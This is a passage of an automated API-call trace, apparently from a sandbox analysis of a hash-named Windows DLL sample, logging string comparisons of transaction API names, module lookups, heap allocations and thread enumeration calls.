lpString2="CreateEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0148.097] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0148.097] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0148.097] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0148.098] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0148.098] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.099] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0148.246] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.246] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0148.246] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0148.246] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0148.246] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0148.247] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0148.247] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0148.247] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0148.247] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0148.247] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0148.248] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0148.248] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0148.249] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0148.249] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0148.249] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0148.250] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0148.250] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0148.251] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0148.251] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0148.252] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0148.252] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0148.252] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0148.252] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0148.252] GetProcessHeap () returned 0x470000 [0148.252] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x470000) returned 1 [0148.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0148.265] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0148.265] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x2d95030 [0148.267] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x478290 [0148.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_create_compress", cchWideChar=-1, lpMultiByteStr=0x478290, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_create_compress", lpUsedDefaultChar=0x0) returned 20 [0148.267] GetLastError () returned 0x0 [0148.267] SetLastError (dwErrCode=0x0) [0148.267] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_create_compressW") returned 0x0 [0148.267] GetLastError () returned 0x7f [0148.267] SetLastError (dwErrCode=0x7f) [0148.267] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_create_compressA") returned 0x0 [0148.267] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_create_compress") returned 0x7ffc45f1a210 [0148.267] GetActiveWindow () returned 0x0 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb8) returned 0x4788a0 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x148) returned 0x47ac50 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3e8) returned 0x489380 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x489d90 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x50) returned 0x2d94850 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x489dd0 [0148.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x50) returned 0x2d94f70 [0148.269] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x2d94bb0 [0148.270] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x489d10 [0148.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x470000) returned 1 [0148.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x478290 | out: hHeap=0x470000) returned 1 [0148.270] GetCurrentProcessId () returned 0x1148 [0148.270] GetCurrentThreadId () returned 0x115c [0148.270] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0148.452] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.595] Thread32Next 